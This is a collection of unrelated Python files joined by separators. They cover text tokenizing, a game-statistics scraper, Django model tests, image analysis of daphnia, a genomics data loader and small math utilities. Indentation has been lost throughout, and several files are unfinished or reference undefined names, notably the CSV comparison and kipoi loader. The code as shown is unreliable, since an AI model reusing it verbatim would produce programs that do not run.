def sent_tokenize_multi(inp,fh=False):
ans = []
for i in inp:
ans.append(sent_tokenize(i))
if fh:
file = open("et/data/temp/sent_tokenizer.json","w")
file.write(json.dumps(ans,indent=4))
return ans
if __name__=="__main__":
print(sent_tokenize_multi(["Banana,Mango,Apple2,etc. I like them all, but, it's bad.","The dog is cute!"],True))
|
import sys
sys.path.insert(1, "../lua")
import Sym
class TestSym:
def testSym(self):
str = "aaaabbc"
sym = Sym.Sym(0, "symbols")
for i, x in enumerate(str):
sym.add(x)
mode = sym.mid()
entropy = sym.div()
entropy = (1000*entropy//1)/1000
print(" Mode =", mode)
print("Entropy =", entropy)
if mode == "a" and 1.38 >= entropy >= 1.37:
return 0
else:
return 1
if __name__ == '__main__':
result = TestSym.testSym(1)
print(result)
|
import numpy as np
from sklearn.datasets import load_boston
from sklearn.linear_model import LinearRegression
import matplotlib.pyplot as plt
Dataset = []
d1 = [[2345,34,45],[3456,4,5],[4567,7,8],[5678, 23, 63]]
X = [[10,20,30],[2,3,4], [5,6,8]]
Y = [14565, 654, 765]
# X = np.array(X).reshape(-1,1)
X = np.array(X)
Y = np.array(Y)
# Y = Y.reshape(-1,1)
print(X.shape,Y.shape)
model = LinearRegression()
model = model.fit(X, Y)
beta_1 = model.coef_[0]
beta_2 = model.coef_[1]
beta_3 = model.coef_[2]
beta_0 = model.intercept_
print("Y =",beta_0,beta_1,"x1+", beta_2,"x2+",beta_3,"x3")
# print(beta_0, beta_1, beta_2)
# y_new = model.predict(100) #구축된 모델에 대해 임의의 값 예측
# print(y_new)
Dataset = []
d1 = [1,2,3]
d2 = [3,4,5]
Dataset.append(d1)
Dataset.append(d2)
Dataset.append([6,7,8])
kwon = np.array(Dataset)
# print(kwon)
a = np.mean(Dataset, axis=0)
# print(a)
|
"""
MIT License
Copyright (c) 2020-2021 Dmitriy Trofimov
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import re
import requests
import logging
from typing import Union, Dict, List, Optional
from enum import Enum
from bs4 import BeautifulSoup, Tag
from .exceptions import UserHasClosedStatisticsException, UserNotFoundException, BadHTTPStatusCode, NotAuthException, \
BattalionNotFound, BattalionSearchTooShortQuery, BattalionSearchBattalionNotFound
from .player import PlayerStatistics
from .battalion import BattalionMemberEntry, BattalionSearchResultEntry
logger = logging.getLogger(__name__)
class GameMode(Enum):
PVP = 0
PVE = 1
LOW = 2
GLOPS = 3
RANKED = 4
RB = RANKED
class API:
def __init__(self, raw_cookie: Optional[List[Dict]] = None):
"""
:param raw_cookie :class:`Optional[Dict, List]`
containing exported with "EditThisCookie" Chrome extension cookie from aw.mail.ru
"""
# Paragraph that shows if we are not authenticated on site
self.__NOT_AUTH_CHECK = [
'<p>Для просмотра данной страницы вам необходимо авторизоваться или <a href="/user/register/">зарегистрироваться</a> на сайте.</p>',
'<p>Для просмотра данной страницы вам необходимо авторизоваться или <a href="" onclick="__GEM.showSignup();return false;" target="_blank">зарегистрироваться</a> на сайте.</p>'
]
self.__NOT_AUTH_CHECK_BATTALION = '<div class="node_notice warn border">Необходимо авторизоваться.</div>'
# Div with text shows that user closed his statistics
self.__CLOSED_STAT = '<div class="node_notice warn border">Пользователь закрыл доступ!</div>'
# Div with text shows that player with given nickname does not exist
self.__PLAYER_NOT_EXISTS = '<div class="node_notice warn border">Пользователь не найден!</div>'
# Base URL for player statistics
self.__user_stats_url = 'https://armata.my.games/dynamic/user/?a=stats'
# Base URL for battalion page
self.__battalion_stats_url = 'https://armata.my.games/dynamic/aliance/index.php?a=index'
# Session that will contain cookies
self.__session: requests.Session = requests.Session()
# Dict with cookies
self.__cookie: Union[Dict, List, None] = None
if raw_cookie:
self.__cookie = self.__prepare_cookie(raw_cookie)
# Clean HTML from tags to extract only data
@staticmethod
def __clean_html(raw_html):
cleanr = re.compile('<.*?>')
cleantext = re.sub(cleanr, '', raw_html)
return cleantext
@classmethod
def __extract_battles_per_level(cls, level_stats: List[Tag]) -> List[int]:
battles = []
for item in level_stats:
children = list(item.children)
battles.append(int(cls.__clean_html(str(children[-2]))))
return battles
@staticmethod
def __calculate_level_sum(level_stats: List[int]) -> int:
total_sum = 0
for index, item in enumerate(level_stats, 1):
total_sum += index * item
return total_sum
@staticmethod
def __prepare_cookie(raw_cookie: Union[Dict, List]) -> Dict:
"""
:param raw_cookie :class:`Union[Dict, List]`: Raw cookie from EditThisCookie
:return: :class:`dict` with "cleaned" cookies
"""
new_cookie_dict = dict()
for item in raw_cookie:
new_cookie_dict[item['name']] = item['value']
return new_cookie_dict
def __get_page(self, url: str) -> str:
"""
:param url :class:`str` URL to retrieve.
:return: :class:`str` That contains decoded HTML page
"""
logger.info('Performing request to {0}'.format(url))
request = self.__session.get(url, cookies=self.__cookie)
if request.status_code == 200:
page = request.content.decode('utf-8')
return page
logger.error('Got non 200 status code on request to {0}. Status code: {1}'.format(url, request.status_code))
raise BadHTTPStatusCode(f'Got non 200 status code: {request.status_code}', status_code=request.status_code)
def __get_player_statistic_page(self, nickname: str, mode: int, data: int, tank_id: int, day: int = 0,
ajax: int = 0, maintype: int = 0) -> str:
"""
:param nickname: Nickname of user to find.
:param mode: Game mode Number from 0 to 4 {pvp, pve, low, glops, ranked}.
:param data: CSA ID of player to find(overwrites user nickname) if not 0.
:param tank_id: staticID of tank to find for(0 means overall stat for mode).
:param day: Filter stats by some date/battle count.
:param ajax: Is data should be returned like in ajax request (DONT CHANGE IT OR WILL BROKE).
:param maintype: In-game type of vehicle(0 all types, 1 - MBT, 2 - LT, 3 - TD, 4 - AFV)
:return: string with decoded HTML page
"""
url = f'{self.__user_stats_url}&name={nickname}&mode={mode}&data={data}&type={tank_id}&maintype={maintype}&day={day}&ajax={ajax}'
page = self.__get_page(url)
return page
def __get_player_statistics(self, page: str, nickname=None) -> PlayerStatistics:
"""
:param page: string with HTML document
:return: `PlayerStatistics` instance
"""
# Let's parse the page
page_parser = BeautifulSoup(page, "html.parser")
# Get page "notifications" and look for error messages
notifications = list(page_parser.find_all('p'))
if not notifications:
notifications = page_parser.find_all('div')
notifications = list(notifications)
# Check if we authenticated (if not, then notifications[0] will be equal to one of items in NOT_AUTH_CHECK )
if str(notifications[0]) in self.__NOT_AUTH_CHECK:
logger.error('Error on parsing page: Client is not authenticated')
raise NotAuthException('I am not authenticated on aw.mail.ru')
# Check if user exists( if user does not exist, then notifications[0] will be equal to PLAYER_NOT_EXISTS )
if self.__PLAYER_NOT_EXISTS == str(notifications[0]):
logger.warning('Player {} was not found'.format(nickname))
raise UserNotFoundException(f'User {nickname} nickname was not found', nickname=nickname)
# Check did user closed stats
if '<div class="node_notice warn border">Пользователь закрыл доступ!</div>' == str(notifications[0]):
logger.warning('Player {} has closed his statistics'.format(nickname))
raise UserHasClosedStatisticsException(f'{nickname} closed his stats', nickname=nickname)
# There is no errors, so go ahead and parse page for information
nickname = self.__clean_html(str(page_parser.find("div", {"class": "name"}))).split('\n')[1]
__battalion_info_dirty = page_parser.find('div', {'class': 'clan'})
__battalion_tag_and_fullname_dirty = str(__battalion_info_dirty.contents[3]).split()
battalion_tag = __battalion_tag_and_fullname_dirty[0].replace('<span>', '').replace('[', '').replace(']', '')
battalion_full_name = __battalion_tag_and_fullname_dirty[1].replace('</span>', '').replace('[', '').replace(']',
'')
if len(battalion_tag) == 0:
battalion_tag = None
battalion_full_name = None
__battles_played_dirty = str(page_parser.find("div", {"class": "total"}))
__battles_played_dirty = self.__clean_html(__battles_played_dirty).split()[-1].replace('сыграно', '')
battles_played: int = int(__battles_played_dirty) if __battles_played_dirty else 0
__average_damage_data = page_parser.findAll("div", {"class": "list_pad"})
__clean_html = self.__clean_html(str(__average_damage_data[3]))
__parsed_data = __clean_html.split('\n')
average_damage = __parsed_data[4]
average_damage = average_damage.strip()[3::]
overall_spotting_damage = __parsed_data[6].split()[2].replace('разведданным', '')
overall_spotting_damage = float(overall_spotting_damage) if overall_spotting_damage else 0.0
__kills_info_dirty = page_parser.find('div', {'id': 'profile_main_cont'}).find('div', {'class': 'game_stats2'})
__average_kills_info_dirty = __kills_info_dirty.find('div', {'class': 'list_pad'}).find_all('div')
__clean_average_kills_info = self.__clean_html(str(__average_kills_info_dirty[2]))
average_kills = __clean_average_kills_info.split()[-1][3::]
average_kills = float(average_kills) if average_kills else 0.0
winrate = str(page_parser.find("span", {"class": "yellow"}))
winrate = self.__clean_html(winrate)
levels_data = page_parser.find('div', {'class': 'game_stats3'})
if levels_data:
__level_data_dirty = list(levels_data.find('div', {'class': 'diag_pad'}).children)
__levels_data_dirty_tags: List[Tag] = [item for item in __level_data_dirty if item != '\n']
levels = self.__extract_battles_per_level(__levels_data_dirty_tags)
average_level = self.__calculate_level_sum(levels) / battles_played if battles_played else None
else:
average_level = None
return PlayerStatistics(**{'winrate': float(winrate[:-1]), 'battles': battles_played,
'damage': float(average_damage), 'clantag': battalion_tag,
'battalion_full': battalion_full_name,
'average_spotting': overall_spotting_damage / battles_played if battles_played else 0.0,
'average_kills': average_kills,
'average_level': average_level,
'nickname': nickname})
def __parse_battalion_page_for_nicknames(self, page: str) -> List[Dict]:
# TODO Complete doc-string
"""
This is fucking hell, get outta here if you dont want to burn your eyes
I warned you
:param page:
:return:
"""
soup = BeautifulSoup(page, 'html.parser')
# So, if battalion with given id does not exist
# then instead of HTML page we will receive JSON, telling browser to redirect on battalion rating page
if page == r'{"redirect":"\/alliance\/top"}':
logger.warning('Battalion with given ID was not found')
raise BattalionNotFound("Battalion with given ID was not found")
# Get page "notifications" and look for error messages
notifications = list(soup.find_all('p'))
if not notifications:
notifications = soup.find_all('div')
notifications = list(notifications)
# Check if we authenticated (if not, then notifications[1] will be equal to __NOT_AUTH_CHECK_BATTALION )
if self.__NOT_AUTH_CHECK_BATTALION == str(notifications[1]):
logger.error('Error on parsing page: Client is not authenticated')
raise NotAuthException('I am not authenticated on aw.mail.ru')
# Get all divs with cont class( Cont class is class for player information)
data = soup.find_all('div', {'class': 'cont'})
# This is the list where we gonna keep track of players
battalion_players = []
# YE I KNOW THIS IS HORRIBLE AS FUCK
# SO, in here we are iterating over sub-tags in <div class='cont'>
for item in str(data[0]).split('\n'):
# Item will be something like this:
# <div><a href="/user/stats?data=458829630">T57Heavy-Tank</a><br/><span>Рядовой</span></div>
# if item is a player line
if item.startswith('<div><a href="/user/stats'):
# Here we are getting rid of all HTML stuff like tags, hrefs, etc by replacing them with space-symbols
# We will get something like this:
# 485633946 RUBIN ><span>Командир</span></div>
# Imagine making a list from that
# Then we will have something like this: ['', '485633946', 'RUBIN', '><span>Командир</span></div>']
# Only thing we need from that is ID and nickname, so lets extract them below
_, player_id, nickname, battalion_role = \
item.replace('<div><a href="/user/stats?', '').replace('">', ' ').replace('</a><br/', ' ') \
.replace('data=', ' ').split(' ')
# Clean tags in battalion_role
battalion_role = battalion_role.replace('><span>', '').replace('</span></div>', '')
# Create a dictionary with player ID and player nickname and add this to List of all players
player = {'id': int(player_id), 'nickname': nickname, 'role': battalion_role}
battalion_players.append(player)
# Eventually, return all battalion players
return battalion_players
def get_battalion_players(self, battalion_id: int) -> List[BattalionMemberEntry]:
"""
Retrieves battalion players by given battalion ID
:param battalion_id: ID of battalion
:return: list of players in this battalion
"""
# TODO: Optimize that algorithm, so we would need to iterate over list two times here and in page parser method
page = self.__get_page(f'{self.__battalion_stats_url}&data={battalion_id}')
__temp_battalion_players = self.__parse_battalion_page_for_nicknames(page)
battalion_players: List[BattalionMemberEntry] = []
for internal_dict_entry in __temp_battalion_players:
battalion_players.append(
BattalionMemberEntry(nickname=internal_dict_entry['nickname'],
id=internal_dict_entry['id'],
role=internal_dict_entry['role'],
battalion_id=battalion_id)
)
return battalion_players
def get_statistic_by_nickname(self, nickname, mode: Union[int, GameMode] = 0, player_id: int = 0, tank_id: int = 0,
day: int = 0) -> PlayerStatistics:
"""
Retrieves player statistics in mode on specified tank by given nickname or playerID
:raises :exc:`UserHasClosedStatisticsException`, :exc:`NotAuthException`,:exc:`UserNotFoundException`
:param nickname: Nickname of user to find
:param mode: Game mode Number from 0 to 4 {pvp, pve, low, glops, ranked}
:param player_id: CSA ID of player to find(overwrites user nickname if not 0)
:param tank_id: staticID of tank to find for(0 means overall stat for mode)
:param day: Filter stats by some date/battle count
:return: :class:`PlayerStatistics`
"""
# If GameMode instance was passed as a mode, than assign number from GameMode.value to mode variable
if isinstance(mode, GameMode):
mode = mode.value
# Get page
page = self.__get_player_statistic_page(nickname, mode, player_id, tank_id, day)
# Parse the page
parsed_data = self.__get_player_statistics(page, nickname)
return parsed_data
def search_battalion(self, battalion_name: str) -> List[BattalionSearchResultEntry]:
"""
Searches for battalion by given name
:raises :exc:`BattalionSearchTooShortQuery` if you gave less than 4 symbols for search
:raises :exc:`BattalionSearchBattalionNotFound` if battalion with given name was not found
versionadded:: 1.1
:param battalion_name:
:return: :class:`List[BattalionSearchResultEntry]`
List of BattalionSearchResultEntry dataclass instances
"""
import json
r = self.__session.post(f'https://armata.my.games/dynamic/gamecenter/?a=clan_search',
data={'name': battalion_name})
if r.status_code == 200:
__dirty_content = json.loads(r.content.decode('utf-8'))
if __dirty_content['error'] == 0:
__battalions_search_result_data = __dirty_content['data']
search_result = []
for key in __battalions_search_result_data.keys():
search_result.append(BattalionSearchResultEntry(__battalions_search_result_data[key], int(key)))
return search_result
if __dirty_content['error'] == 1:
raise BattalionSearchTooShortQuery(
f'Given battalion name is too short for process.'
f' 4 symbols required, {len(battalion_name)} were given',
len(battalion_name))
if __dirty_content['error'] == 2:
raise BattalionSearchBattalionNotFound(f'Battalion with name "{battalion_name}"'
f' was not found.', battalion_name)
raise BadHTTPStatusCode(f'Received not 200 status code', r.status_code)
AW = API
|
#### This code searches over subsets of streams and locations simultaneously
#### The search happens centered on every tract in the city, with a radius (defined below) of .01
#### Ideas for exploratory data analysis:
#### 1. Tweak this radius
#### 2. Leave out 50% of data (create a training dataset and a testing dataset), run this on
#### the training data set and see whether any of the correlations you find are still significant
#### for the test data set.
RADIUS = .01
from ccss import *
from ccss import greedy_search as search
print "precalculating centers of all tracts (this may take a little while)"
with mytimer:
tract_centers = calculate_tract_centers(input)
print "completed in %d seconds"%mytimer.elapsed
f = open(opts.output,"w")
out = csv.writer(f)
out.writerow("predict tract R Dopt Sopt Xn Yn elapsed".split())
n_tracts = len(np.unique(input['tract'])) * 1.0
for i, tract in enumerate(np.unique(input['tract'])):
data = input[match_tracts(input, nearby_tracts(tract_centers[tract],input,RADIUS))]
with mytimer:
R, Sopt, Dopt, iters = search(data, np.array(streams))
Xn = np.sum(match_streams(data,Dopt) * match_tracts(data,Sopt))
Yn = np.sum(match_streams(data,[opts.predict]) * match_tracts(data,Sopt))
print "\n\n-------------------- TRACT", tract
print "Correlation = %.05f"%R
print "for predicting", opts.predict, "with these leading indicators:", ' '.join(Dopt)
print "# of events in X:", Xn
print "# of events in Y:", Yn
if np.abs(R) > .3:
out.writerow([opts.predict, tract, R, Dopt, Sopt, Xn, Yn, mytimer.elapsed])
f.flush()
print "%d %% done", i / n_tracts
print "search complete, output written to %s"%(opts.output)
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 3 15:02:25 2013
@author: team
"""
import hydro_wrapper
hydro_wrapper.change_param(12,9, 180, 1, 1, 1)
hydro_wrapper.change_data_time(12,12,14,2013,12,23,2013)
hydro_wrapper.timer(15600)
hydro_wrapper.runSELFE(12,10800)
|
from csv_comparison_package import Compare
from csv_comparison_package import Field
# TODO LEFT HERE
def check_for_identical_row(comparable_a: Compare, comparable_b: Compare):
"""
Sort both data frames
Both data frames must have the same indices
Get indices of one data frame
for each all the indices
"""
comparable_a_index_name = comparable_a.index_column_name[0][
Field.column_name.value] # not supporting multi index
comparable_b_index_name = comparable_b.index_column_name[0][Field.column_name.value]
f1_index_of_identical_row = []
f2_index_of_identical_row = []
for index_val in data_frame_1_index:
identical_cells_in_the_row = True
f1_pandas_index = df_1.loc[index_val, const.CONST_INDEX_NAME_FOR_DEFAULT_PANDAS_INDEX_COLUMN]
f2_pandas_index = df_2.loc[index_val, const.CONST_INDEX_NAME_FOR_DEFAULT_PANDAS_INDEX_COLUMN]
for header_val in data_frame_1_headers_with_index_column_removed_set:
f1_str = df_1.loc[index_val, header_val]
f2_str = df_2.loc[index_val, header_val]
if f1_str != f2_str:
identical_cells_in_the_row = False
break
pass
if identical_cells_in_the_row:
f1_index_of_identical_row.append((f1_pandas_index, index_val))
f2_index_of_identical_row.append((f2_pandas_index, index_val))
|
#Python code to generate all anagrams of a word
def anagrams(word):
if len(word)==1:
return [word]
result=[]
for i in range(len(word)):
letter=word[i]
rest=word[0:i] + word[i+1:]
for tail in anagrams(rest):
result.append(letter + tail)
return result
def all_digit_perms():
digits = "0123456789"
perms = anagrams(digits)
perms.sort()
return perms
print all_digit_perms()[999999]
|
#-*- coding: UTF-8 -*-
from plone.directives import form
# Interface class; used to define content-type schema.
class Iormfolder(form.Schema):
"""
db map container
""" |
def greatest_common_divisor(m, n):
low = min(m, n)
high = max(m, n)
if low == 0:
return high
for divisor in reversed(xrange(1, low + 1)):
if low % divisor == 0 and high % divisor == 0:
return divisor
def test_greatest_common_divisor():
gcd = greatest_common_divisor
assert gcd(6, 9) == 3
assert gcd(9, 6) == 3
assert gcd(14, 6) == 2
assert gcd(1, 2) == 1
assert gcd(1, 1) == 1
assert gcd(1, 0) == 1
assert gcd(2, 0) == 2
|
"""Test the healthcheck feature."""
from asserts import assert_equal
from behave import given, then, when
from behave.runner import Context
@given("a healthy server")
def healthy_server(_context: Context) -> None:
"""Server should be healthy by default, so no step implementation needed."""
@when("a client checks the server health")
def get_health(context: Context) -> None:
"""Get health status."""
context.get("health")
@then("the server answers")
def check_health(context: Context) -> None:
"""Check the server health."""
assert_equal({}, context.response.json())
|
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.core import exceptions
from core import models
from uuid import uuid4
class ModelTests(TestCase):
def test_create_user_with_email_successful(self):
""" Test creating a new user with an email is successful """
email = 'test@gmail.com'
password = '123456'
user = get_user_model().objects.create_user(
email=email,
password=password
)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password(password))
def test_new_user_email_normalized(self):
""" Test the email for a new user is normalized (turned to lower case) """
email = 'test@GMAIL.COM'
password = '123456'
user = get_user_model().objects.create_user(
email=email,
password=password
)
self.assertEqual(user.email, email.lower())
def test_new_user_invalid_email(self):
""" Test creating user with no email raises error """
with self.assertRaises(ValueError):
get_user_model().objects.create_user(
email=None,
password='123456'
)
def test_create_new_superuser(self):
""" Test creating a new superuser """
user = get_user_model().objects.create_superuser(
email='test@gmail.com',
password='123456'
)
self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff)
def test_create_customer(self):
""" Test creating a new customer """
user = get_user_model().objects.create_user(
email='test@gmail.com',
password='123456'
)
customer = models.Customer.objects.create(
user=user,
customer_id=73478643,
gender='male',
province='Alborz',
city='karaj',
street='street',
alley='alley'
)
self.assertEqual(user.email,customer.user.email)
def test_create_customer_already_exists(self):
""" Test creating a customer that already exists """
user = get_user_model().objects.create_user(
email='test@gmail.com',
password='123456'
)
customer1 = models.Customer.objects.create(
user=user,
customer_id=73478643,
gender='male',
province='Alborz',
city='karaj',
street='street',
alley='alley'
)
with self.assertRaises(Exception):
customer2 = models.Customer.objects.create(
user=user,
customer_id=73478643,
gender='male',
province='Alborz',
city='karaj',
street='street',
alley='alley'
)
def test_create_personnel(self):
""" Test creating a new personnel """
user = get_user_model().objects.create_user(
email='test@gmail.com',
password='123456'
)
user.is_staff = True
personnel = models.Personnel.objects.create(
user=user,
personnel_code=445455,
gender='male',
province='Alborz',
city='karaj',
street='street',
alley='alley',
birth_date='2015-11-23',
age=6,
salary=10000.25
)
self.assertEqual(user.email, personnel.user.email)
def test_create_personnel_already_exists(self):
""" Test creating a new personnel """
user = get_user_model().objects.create_user(
email='test@gmail.com',
password='123456'
)
user.is_staff = True
personnel1 = models.Personnel.objects.create(
user=user,
personnel_code=445455,
gender='male',
province='Alborz',
city='karaj',
street='street',
alley='alley',
birth_date='2015-11-23',
age=6,
salary=1000.25
)
with self.assertRaises(Exception):
personnel2 = models.Personnel.objects.create(
user=user,
personnel_code=445455,
gender='male',
province='Alborz',
city='karaj',
street='street',
alley='alley',
birth_date='2015-11-23',
age=6,
salary=1000.25
)
def test_branch_str(self):
""" Test the branch string representation
(creating a branch succussfuly)
"""
branch = models.Branch.objects.create(
province='province',
city='city',
street='street',
alley='alley',
phone='+989127777777',
branch_code=12345678
)
self.assertEqual(str(branch), branch.province + '-' + branch.city)
def test_food_str(self):
""" Test the food string representaion
(creating a food succussfuly)
"""
food = models.Food.objects.create(
name='کباب کوبیده',
price=30000,
description='کباب کوبیده به همراه مخلفات',
category='breakfasts'
)
self.assertEqual(food.category, 'breakfasts')
self.assertEqual(str(food), food.name)
def test_table_str(self):
""" Test the table string representaion
(creating a table succussfuly)
"""
branch = models.Branch.objects.create(
branch_code=1111,
)
table = models.Table.objects.create(
is_empty=True,
is_reserved=False,
capacity=4,
branch=branch
)
self.assertEqual(str(table), str(table.pk))
def test_order_online_str(self):
""" Test the online order string representaion
(adding an online order succussfuly)
"""
branch = models.Branch.objects.create(
branch_code=1234
)
customer = models.Customer.objects.create(
user=get_user_model().objects.create_user(
email='test1@gmail.com',
password=4141
),
customer_id=1111
)
food = models.Food.objects.create(
name='کباب کوبیده',
price=10000,
description='کباب کوبیده به همراه مخلفات'
)
user = get_user_model().objects.create_user(
email='test2@gmai.com',
password='123',
)
user.is_staff = True
deliverer = models.Personnel.objects.create(
user=user,
personnel_code=4545,
gender='male',
province='Alborz',
city='karaj',
street='street',
alley='alley',
birth_date='2015-11-23',
age=6,
salary=10000.25
)
order = models.OnlineOrder.objects.create(
customer=customer,
branch=branch,
food=food,
deliverer=deliverer,
pay_code=str(uuid4()),
count=2
)
self.assertEqual(str(order), order.pay_code) |
# -*- coding: utf-8 -*-
"""
Created on Fri May 3 14:21:59 2019
@author: Nelson
"""
# import libraries
import os
import cv2
import numpy as np
import sys
from math import pi
from skimage import morphology, measure
from skimage.filters import scharr
from scipy import ndimage
import math
import copy
import warnings
import utils
import json
# create function that does not require landmarks
def head_method(image):
''' This method calculates the Length of the major axis of a fitted ellipse
around the binary mask of the daphnia
input:
image source
output: dictionary with 8 values:
output['ID'] : ID of the image
output['perimeter'] = perimeter os binary mask
output['area'] = area of binary mask
output['minor'] = minor axis of fitted elipse
output['solidity'] = ratio of the area of the binary mask
and the area of the convex hull
output['full.Length'] = major axis length of the fitted elipse
output['image'] = imgage with plotted size estimate'''
# import and resize
img_res = utils.import_image(image)
# define output into different variables
img = img_res["img"]
gray = img_res["gray"]
scf = img_res["scf"]
# create mask
edges = utils.create_mask(gray)
# create regionproperties
props = utils.create_props(edges, gray)
# erode mask and return new properties
props, edges_res, label_img = utils.erode_mask(edges, props, gray)
# plot binary image
binary2 = utils.plt_binary(edges_res, label_img, props)
# plot mask contour on image
img = utils.plt_contour(binary2, img)
# plot elipse on image
img = utils.plt_elipse(img, props)
# plot major axis of fitted elipse
img = utils.plt_majaxis(img, props)
# plot minor axis of fitted elipse
img = utils.plt_minaxis(img, props)
# make dictionary with resuls
res = utils.make_res(img, props, scf, image)
# return results
return(res)
# define function that uses landmarks to calculate body size
# also discard background while detecting eye
def eye_method_2(image):
''' This method uses the eye of the daphnia as a landmark
and calculates the distance to the base of the tail, the length of the tail,
and the angle between the tail and the body
input:
image source
output: dictionary with 8 values:
output['ID'] : ID of the image
output['eye.length'] = Length from eye to base of tail
output['perimeter'] = perimeter os binary mask
output['area'] = area of binary mask
output['minor'] = minor axis of fitted elipse
output['solidity'] = ratio of the area of the binary mask
and the area of the convex hull
output['full.Length'] = major axis length of the fitted elipse
output['tail.Length'] = the length of the tail_length
output['tail.angle'] = the angle between the tail and the line between
eye and the base of the tail
output['image'] = imgage with plotted size estimate'''
# import and resize
img_res = utils.import_image(image)
# define output into different variables
img = img_res["img"]
gray = img_res["gray"]
scf = img_res["scf"]
# create mask
edges = utils.create_mask(gray)
# create regionproperties
props, label_img = utils.create_props(edges, gray, eyeMethod = True)
# define uneroded binary image
binary1 = utils.plt_binary(edges, label_img, props)
# erode mask and return new properties
props, edges_res, label_img = utils.erode_mask(edges, props, gray)
# plot binary image
binary2 = utils.plt_binary(edges_res, label_img, props)
# get major and minor axis
major = props[0].major_axis_length
minor = props[0].minor_axis_length
# add perimeter of mask
perimeter = props[0].perimeter
# add area of mask
area = props[0].area
# add solidity (proportion of the pixels in shape to the pixels in the convex hull)
solidity = props[0].solidity
# find eye in mask
cX, cY = utils.find_eye(binary2, img)
# find tip of tail and length between eye and tip
far_x, far_y, daphnia_Length_eye_tip = utils.find_tip(binary1, cX, cY)
# find base, angle and daphnia length
base_x, base_y, daphnia_Length, angle, contours, tail_Length = utils.find_base(binary2, far_x, far_y, cX, cY, daphnia_Length_eye_tip)
# plot mask contour on image
img = utils.plt_contour(binary2, img)
# plot elipse on image
img = utils.plt_elipse(img, props)
# plot major axis of fitted elipse
img = utils.plt_majaxis(img, props)
# plot minor axis of fitted elipse
img = utils.plt_minaxis(img, props)
# plot tail on image
img = utils.plt_tail(img, far_x, far_y, base_x, base_y)
# plot daphnia Length on image (from eye to base)
img = utils. plt_length(img, cX, cY, base_x, base_y)
# create dictionary with results
res = utils.make_res(
img = img,
props = props,
scf = scf,
image = image,
eyeMethod = True,
tail_Length = tail_Length,
daphnia_Length = daphnia_Length,
angle = angle
)
# return results
return(res)
# if called directly show image output of all three methods
if __name__ == '__main__':
res1 = head_method(sys.argv[1])
try:
res3 = eye_method_2(sys.argv[1])
cv2.imshow('eye method 2', res3['image'])
except:
print('Eye detetion failed!')
cv2.imshow('head method', res1['image'])
cv2.waitKey(0)
cv2.destroyAllWindows()
|
from kipoi.data import Dataset
from kipoiseq.transforms import ReorderedOneHot
from genome_tools import genomic_interval, genomic_interval_set, bed3_iterator
from genome_tools.helpers import open_file
from pyfaidx import Fasta
from footprint_tools import bamfile
from footprint_tools.modeling import bias, prediction
class DataLoader(Dataset):
def __init__(self, intervals_file, fasta_file, bam_file, bias_model_file, shuffle=True):
self.intervals_file = intervals_file
self.fasta_file = fasta_file
self.bam_file = bam_file
self.bias_model_file = bias_model_file
intervals_filehandle=open_file(intervals_file)
self.intervals=genomic_interval_set(bed3_iterator(intervals_filehandle))
self.seq_transform = ReorderedOneHot(alphabet="ACGT")
self.fasta_extractor=None
self.bm=None
self.cutcounts=None
def __len__(self):
return len(self.intervals)
def __getitem__(self, idx):
interval=self.intervals[idx]
if self.fasta is None:
self.fasta_extractor = Fasta(self.fasta_file)
self.cutcounts = bamfile(self.bam_file)
self.bm=bias.kmer_model(self.bias_model_file)
# Set up the footprint-tools class to predict cleavages
pred=prediction(self.cutcounts,
self.fasta_extractor,
interval,
self.bm,
half_window_width = 5,
smoothing_half_window_width = 50,
smoothing_clip = 0.01)
# one hot encode DNA
one_hot_seq = self.seq_transform(pred.seq)
# compute the observed expected DNase I data
obs, exp, win = pred.compute()
inputs=[one_hot_seq, np.vstack([obs['+'][1:], obs['-'][:-1], exp['+'][1:], exp['-'][:-1]])]
ret = {"inputs": inputs,
"targets": outputs}
return ret
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Código
import pygame
pygame.init()
pygame.mixer.music.load('sunset.mp3')
pygame.mixer.music.play()
pygame.event.wait()
# Biblioteca
# print('{}'.format())
# variável = int(input(''))
# variável = float(input(''))
# variável = str(input(''))
# Instalando o pygame
# $ brew install mercurial
# $ brew install sdl sdl_image sdl_mixer sdl_ttf smpeg portmidi
# $ pip install hg+http://bitbucket.org/pygame/pygame |
from typing import Tuple
def index_to_rowcol(index: int, width: int) -> Tuple[int, int]:
"""Translate 1D index to 2D index.
Parameters
----------
index : int
width : int
Width of target 2D matrix.
Returns
-------
Tuple[int, int]
Row / column indices for target 2D matrix.
"""
row = (int)(index / width)
col = index % width
return row, col
|
import cv2
import pysift
import numpy as np
from numpy import float32
def warpTwoImages(img2, img1, H):
'''warp img2 to img1 with homograph H'''
print("=={}==".format(H))
h1,w1 = img1.shape[:2]
h2,w2 = img2.shape[:2]
pts1 = float32([[0,0],[0,h1],[w1,h1],[w1,0]]).reshape(-1,1,2)
print(pts1)
pts2 = float32([[0,0],[0,h2],[w2,h2],[w2,0]]).reshape(-1,1,2)
pts2_ = cv2.perspectiveTransform(pts2, H)
print(pts2_)
pts = np.concatenate((pts1, pts2_), axis=0)
[xmin, ymin] = np.int32(pts.min(axis=0).ravel() - 0.5)
[xmax, ymax] = np.int32(pts.max(axis=0).ravel() + 0.5)
t = [-xmin,-ymin]
Ht = np.array([[1,0,t[0]],[0,1,t[1]],[0,0,1]]) # translate
result = cv2.warpPerspective(img2, Ht.dot(H), (xmax-xmin, ymax-ymin))
